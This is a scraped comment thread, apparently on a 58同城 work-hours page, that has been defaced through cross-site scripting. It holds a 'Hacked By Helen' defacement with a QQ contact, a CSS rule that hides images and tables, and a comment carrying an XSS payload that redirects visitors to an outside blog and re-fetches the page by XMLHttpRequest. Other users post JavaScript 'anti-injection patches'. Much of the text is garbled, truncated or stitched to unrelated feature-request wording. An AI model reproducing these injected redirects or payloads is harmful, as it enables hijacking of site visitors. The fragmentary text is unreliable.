58同城

lizhichao commented over 1 year ago

img,svg,table{visibility: collapse;}

flying81621 commented over 1 year ago

58好像不加班吧，早九点半晚七点多点双休还好吧

xss67612 commented over 1 year ago

Hacked By Helen收徒QQ925999918

superzmy commented over 1 year ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

q8195438 commented over 1 year ago

for (var i=0;i

996-ICU-Test-Xs commented over 1 year ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = ''}

996-ICU-Test-Xs commented over 1 year ago

for(var x of document.getElementsByTagName('script')) { x.innerHTML = ''}

996-ICU-Test-Xs commented over 1 year ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

guotao commented over 1 year ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。反注入补丁 for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> 。

Other features